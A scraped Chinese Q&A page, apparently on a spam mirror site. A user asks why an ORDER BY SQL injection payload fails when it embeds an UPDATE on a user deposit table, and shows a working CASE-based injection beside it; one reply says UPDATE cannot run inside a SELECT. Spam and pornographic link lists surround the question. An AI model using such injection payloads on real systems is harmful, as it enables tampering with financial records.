亚洲精品久久久中文字幕-亚洲精品久久片久久-亚洲精品久久青草-亚洲精品久久婷婷爱久久婷婷-亚洲精品久久午夜香蕉

您的位置:首頁技術文章
文章詳情頁

mysql - sql報錯原因?

瀏覽:73日期:2022-06-13 10:08:51

問題描述

發現一個正在維護的老系統的基于orderBy的sql注入漏洞,準備驗證一下,

我先執行這個sql注入,是可以的

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(select depositfrom sysuser_user_deposit)end)=1 ASC LIMIT 20 OFFSET 0

但是當我執行這個帶update語句的sql時報錯了:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(updatesysuser_user_depositsetdeposit=11)end)=1 ASC LIMIT 20 OFFSET 0

報錯

<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’update<br>sysuser_user_deposit<br>set<br>deposit=11)end)=1 ASC LIMIT 20 OFFSET 0’ at line 9</code>

我應該如何讓他執行update?

問題解答

回答1:

主體是select的時候,里面是不能update的,否則執行不了的,mybatis這種注入我試過,<select>里執行update直接報錯,注入不了

相關文章:
主站蜘蛛池模板: www.色中色 | 性插影院| 成人网免费视频 | 香蕉在线视频网站 | 国产叼嘿久久精品久久 | 欧美日韩国产在线人成dvd | 男人粗大一出一进女人下面视频 | 思99re久久这里只有精品首页 | 黄色一级今 | 福利国产 | 香蕉久久网站 | 国产精品日本一区二区不卡视频 | 亚洲精品15p | 亚洲人人爱 | 久久国产免费福利资源网站 | 美国一级大黄大色毛片 | 欧美亚洲国产色综合 | 1024国产基地| 国产精品呦呦 | 香蕉高清免费永久在线视频 | 国产精品免费大片 | 色亚洲影院| 国产成人精选视频69堂 | 免费精品美女久久久久久久久久 | 成人国产一区二区 | 国产不卡一区二区视频免费 | 色老头福利视频在线观看 | 欧美日韩一本大道香蕉欧美 | 色播在线播放 | 日本在线日本中文字幕日本在线视频播放 | 日本一级毛片冲田杏梨 | 国产精品v欧美精品v日本精 | 黄色短视频免费看 | 国产福利免费在线观看 | 亚洲国产日韩无在线播放 | 亚洲欧美中日韩 | 黄色片子在线观看 | 黄色网址发给我 | 亚洲国产精品看片在线观看 | 国产精品日本一区二区不卡视频 | 欧美特黄一级片 |